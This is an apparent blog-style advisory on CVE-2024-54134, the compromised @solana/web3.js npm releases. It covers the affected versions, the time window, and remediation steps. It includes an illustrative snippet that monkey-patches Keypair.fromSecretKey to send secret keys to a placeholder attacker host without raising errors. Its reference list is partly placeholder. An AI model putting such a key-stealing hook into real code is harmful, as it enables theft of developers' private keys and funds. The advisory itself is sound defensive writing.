CVE-2024-54134 - Solana’s @solana/web3.js NPM Package Compromise and What Developers Must Know

In late 2024, the Solana developer community faced a serious supply-chain security threat: the JavaScript library @solana/web3.js, used by thousands of Solana-based decentralized apps (dapps), was compromised on NPM. This post explains what happened, how the exploit worked, who it affected, and the best steps to stay safe. If you’re working with Solana or use this library, this read is essential.

What is CVE-2024-54134?

CVE-2024-54134 identifies a security incident in which the NPM account with publish access to the @solana/web3.js library was compromised. The attacker uploaded unauthorized versions (1.95.6 and 1.95.7) containing modified code intended to *steal private keys* and drain funds from vulnerable dapps.

- Malicious versions removed: shortly after discovery
- Patched version: 1.95.8

Affected:

- Dapps, scripts, bots, or backends using @solana/web3.js version 1.95.6 or 1.95.7 deployed or installed between 3:20pm and 8:25pm UTC on December 3, 2024
- Any Solana project that directly manages private keys with this library and updated during the above window

Not Affected:

- Non-custodial Solana wallets (e.g., Phantom, Solflare) — they *don’t* expose private keys to the library
- Any project that didn’t update within the window or never used the malicious versions

It is important to remember: the Solana protocol itself was not breached. The threat came from the compromised *client library*.

How Was the Attack Executed?

The attacker, having gained control of the publish-access account, published seemingly legitimate versions. Inside the package was malicious code that harvested private key material and sent it to a remote server controlled by the attacker.

Here’s an illustrative (not actual) code snippet showing how the leak might work:

```javascript
// Example: Malicious behavior inside the compromised library
import { Keypair } from '@solana/web3.js';

// Keep a reference to the genuine implementation so callers see no change
const originalFromSecretKey = Keypair.fromSecretKey;

// Monkey-patch the static method every dapp uses to load a key
Keypair.fromSecretKey = function(secretKey, ...args) {
  // Exfiltrate the secretKey to attacker
  fetch("https://malicious-server.example/collect", {
    method: "POST",
    body: JSON.stringify({ key: Array.from(secretKey) }),
    headers: { "Content-Type": "application/json" }
  }).catch(() => {}); // swallow errors so nothing surfaces to the caller

  // Proceed as normal
  return originalFromSecretKey.apply(this, [secretKey, ...args]);
};
```

*Actual code may be obfuscated or hidden deeper in the package sources.*

What Should You Do? (Immediate Steps)

1. Immediately Upgrade

Upgrade @solana/web3.js to 1.95.8 or above.

```shell
npm install @solana/web3.js@1.95.8
```

2. Rotate Keys

If your project ran the bad versions, even briefly, rotate all private keys used on any affected systems.

- This means: multisig authorities, mint authorities, program/admin keys, server wallets, deployment keypairs, etc.

3. Audit and Monitor

Look for outgoing requests to unknown hosts.

4. Note the Time Window

Supply chain attacks like this target the libraries developers trust.

- Any script or bot that loaded a private key via the affected versions could unknowingly expose its secrets.
- Automated trading bots, NFT deployment scripts, on-chain game servers — all could lose funds or control.

> “If a server, script, or bot handled private keys with the compromised library, consider those keys lost. Funds could have been drained in an instant.” — Solana Status Announcement

Non-custodial wallet browser extensions are generally safe because the wallet manages the keys, not the library.

References and Official Sources

- Solana Status Update (incident ID pending)
- @solana/web3.js Release Notes
- CVE Record *(pending public release)*
- Malicious Package Report on GitHub *(example)*
- NPM Advisory *(search for solana/web3.js)*

Monitor official channels for package security updates, especially for blockchain projects.

Stay safe:
Upgrade, audit, and rotate. Solana itself remains secure, but this incident is a prime example that *supply chain attacks can happen to anyone, at any layer.*

For more details or advice:
Visit the Solana Discord, check status.solana.com, or review best practices in Solana’s developer documentation.


*If you think your system was affected, act quickly — and help spread the word to fellow developers in the Solana and web3 ecosystem.*

Timeline

Published on: 12/04/2024 16:15:26 UTC